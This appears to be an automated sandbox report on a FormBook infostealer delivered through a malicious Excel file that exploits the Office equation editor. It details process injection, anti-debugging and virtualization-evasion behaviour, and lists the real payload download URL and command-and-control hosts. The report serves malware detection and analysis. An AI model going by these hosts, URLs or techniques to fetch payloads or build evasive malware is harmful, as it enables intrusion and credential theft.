Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_0041D4B5 push eax; ret 6_2_0041D508
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_0041D56C push eax; ret 6_2_0041D572
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_0041D502 push eax; ret 6_2_0041D508
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_0041D50B push eax; ret 6_2_0041D572
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_01322445 push ecx; ret 6_2_01322458
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006ADFA1 push ecx; ret 8_2_006ADFB4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00116495 push edx; retf 8_2_001164A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0011D4B5 push eax; ret 8_2_0011D508
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0011D502 push eax; ret 8_2_0011D508
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0011D50B push eax; ret 8_2_0011D572
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0011D56C push eax; ret 8_2_0011D572
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00117811 push cs; ret 8_2_00117815
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0011E9F4 push ds; ret 8_2_0011E9F8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0011DCB9 push edi; ret 8_2_0011DCBA
Drops PE files
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Local\Temp\fdvucso.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Contains functionality to download and launch executables
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03660560 URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_03660560
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival
barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xEC
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 5_2_01321890 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 5_2_01321890
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 0000000000109904 second address: 000000000010990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 0000000000109B7E second address: 0000000000109B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1544 Thread sleep time: -420000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe Last function: Thread delayed
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00409AB0 rdtsc 6_2_00409AB0
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 4_2_00405D7A
Source: C:\Users\Public\vbc.exe Code function: 4_2_004069A4 FindFirstFileW,FindClose, 4_2_004069A4
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040290B FindFirstFileW, 4_2_0040290B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node
Source: C:\Users\Public\vbc.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe API call chain: ExitProcess graph end node
Source: explorer.exe, 00000007.00000000.1006642893.00000000043F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000007.00000000.1025987393.000000000869E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000004.00000002.996387571.0000000000914000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: explorer.exe, 00000007.00000000.1025987393.000000000869E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000lo
Source: explorer.exe, 00000007.00000000.1048517448.000000000037B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.08tp
Source: explorer.exe, 00000007.00000000.1021582479.0000000004423000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.1006642893.00000000043F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: v6nel\5&35c44269e\cdromnvmware_sata_
Source: explorer.exe, 00000007.00000000.1021428867.000000000434F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0Q
Source: explorer.exe, 00000007.00000000.1048485092.0000000000335000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}(
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 5_2_01321D2C _memset,IsDebuggerPresent, 5_2_01321D2C
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 5_2_0132558A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 5_2_0132558A
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 5_2_01321D17 GetProcessHeap, 5_2_01321D17
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00409AB0 rdtsc 6_2_00409AB0
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036605E6 mov edx, dword ptr fs:[00000030h] 2_2_036605E6
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 5_2_001103F8 mov eax, dword ptr fs:[00000030h] 5_2_001103F8
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 5_2_0011061D mov eax, dword ptr fs:[00000030h] 5_2_0011061D
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 5_2_001106F7 mov eax, dword ptr fs:[00000030h] 5_2_001106F7
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 5_2_00110736 mov eax, dword ptr fs:[00000030h] 5_2_00110736
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 5_2_00110772 mov eax, dword ptr fs:[00000030h] 5_2_00110772
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A526F8 mov eax, dword ptr fs:[00000030h] 6_2_00A526F8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006B26F8 mov eax, dword ptr fs:[00000030h] 8_2_006B26F8
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_0040ACF0 LdrLoadDll, 6_2_0040ACF0
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 5_2_0132439B SetUnhandledExceptionFilter, 5_2_0132439B
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 5_2_013243CC SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_013243CC
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_0132439B SetUnhandledExceptionFilter, 6_2_0132439B
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_013243CC SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_013243CC

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.insurancecentral.info
Source: C:\Windows\explorer.exe Domain query: www.xinli-ac.com
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: B20000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Memory written: C:\Users\user\AppData\Local\Temp\fdvucso.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Thread register set: target process: 1860 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread register set: target process: 1860 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Process created: C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\fdvucso.exe" Jump to behavior
Source: explorer.exe, 00000007.00000000.1002436760.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.990258090.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1016566477.0000000000830000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.1001996367.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.989934205.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1002436760.0000000000830000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000007.00000000.1002436760.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.990258090.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1016566477.0000000000830000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager<
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 5_2_01323283 cpuid 5_2_01323283
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 5_2_01323EC8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 5_2_01323EC8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 4_2_00403646

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 6.0.fdvucso.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.fdvucso.exe.120000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.fdvucso.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.fdvucso.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.fdvucso.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.fdvucso.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.fdvucso.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.fdvucso.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1034923412.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1171279737.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1171209190.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.984865272.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.982519583.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1034839631.0000000000080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.983927373.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.1027235424.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1171353184.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.1015398886.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 6.0.fdvucso.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.fdvucso.exe.120000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.fdvucso.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.fdvucso.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.fdvucso.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.fdvucso.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.fdvucso.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.fdvucso.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1034923412.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1171279737.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1171209190.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.984865272.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.982519583.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1034839631.0000000000080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.983927373.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.1027235424.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1171353184.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.1015398886.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 626188 Sample: New order.xlsx Startdate: 13/05/2022 Architecture: WINDOWS Score: 100 57 Multi AV Scanner detection for domain / URL 2->57 59 Found malware configuration 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 13 other signatures 2->63 11 EQNEDT32.EXE 12 2->11         started        16 EXCEL.EXE 34 26 2->16         started        process3 dnsIp4 45 104.168.33.25, 49171, 80 AS-COLOCROSSINGUS United States 11->45 39 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 11->39 dropped 41 C:\Users\Public\vbc.exe, PE32 11->41 dropped 83 Office equation editor establishes network connection 11->83 85 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->85 18 vbc.exe 19 11->18         started        43 C:\Users\user\Desktop\~$New order.xlsx, data 16->43 dropped file5 signatures6 process7 file8 37 C:\Users\user\AppData\Local\...\fdvucso.exe, PE32 18->37 dropped 65 Multi AV Scanner detection for dropped file 18->65 67 Machine Learning detection for dropped file 18->67 22 fdvucso.exe 18->22         started        signatures9 process10 signatures11 69 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 22->69 71 Tries to detect virtualization through RDTSC time measurements 22->71 73 Injects a PE file into a foreign processes 22->73 25 fdvucso.exe 22->25         started        process12 signatures13 75 Modifies the context of a thread in another process (thread injection) 25->75 77 Maps a DLL or memory area into another process 25->77 79 Sample uses process hollowing technique 25->79 81 Queues an APC in another process (thread injection) 25->81 28 explorer.exe 25->28 injected process14 dnsIp15 47 www.xinli-ac.com 154.222.70.249, 49172, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 28->47 49 www.insurancecentral.info 28->49 87 System process connects to network (likely due to code injection or exploit) 28->87 32 svchost.exe 28->32         started        signatures16 process17 signatures18 51 Modifies the context of a thread in another process (thread injection) 32->51 53 Maps a DLL or memory area into another process 32->53 55 Tries to detect virtualization through RDTSC time measurements 32->55 35 cmd.exe 32->35         started        process19
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.168.33.25
 unknown United States
36352 AS-COLOCROSSINGUS true
154.222.70.249
 www.xinli-ac.com Seychelles
136800 XIAOZHIYUN1-AS-APICIDCNETWORKUS true

Contacted Domains

Name IP Active
www.xinli-ac.com 154.222.70.249 true
www.insurancecentral.info unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
www.worklifefirewalls.com/m9y5/ true
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
 low
http://104.168.33.25/gtb/vbc.exe true
  • 13%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://www.xinli-ac.com/m9y5/?3f=ylBe/k3Uhk7dBIeXI//KFRH0TaC7pxYziRrYgQ8MI5uD9iOXGI4rYw0cjZ+4cEk1rP/qTw==&-Z=f4l0drr false
  • Avira URL Cloud: safe
 unknown